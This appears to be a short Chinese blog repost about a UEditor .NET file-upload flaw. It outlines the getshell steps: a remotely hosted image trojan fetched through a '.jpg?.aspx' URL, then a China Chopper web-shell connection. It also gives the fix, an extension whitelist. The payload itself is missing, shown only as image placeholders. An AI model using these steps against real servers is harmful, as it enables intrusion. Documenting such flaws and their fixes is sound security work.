ue编辑器php漏洞:ueditor getshell

ueditor getshell漏洞概述

8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。

ueditor getshell漏洞重现

Payload:

shell addr:

图片马x.jpg放在自己服务器上

提交http://www.domain.top/x.jpg?.aspx

ue编辑器php漏洞:ueditor getshell_第1张图片

菜刀连接:

ue编辑器php漏洞:ueditor getshell_第2张图片

ueditor getshell修复方案

增加文件扩展名校验(白名单)

ueditor getshell漏洞分析

 
 

你可能感兴趣的:(算法模型,信息处理,c#,开发语言)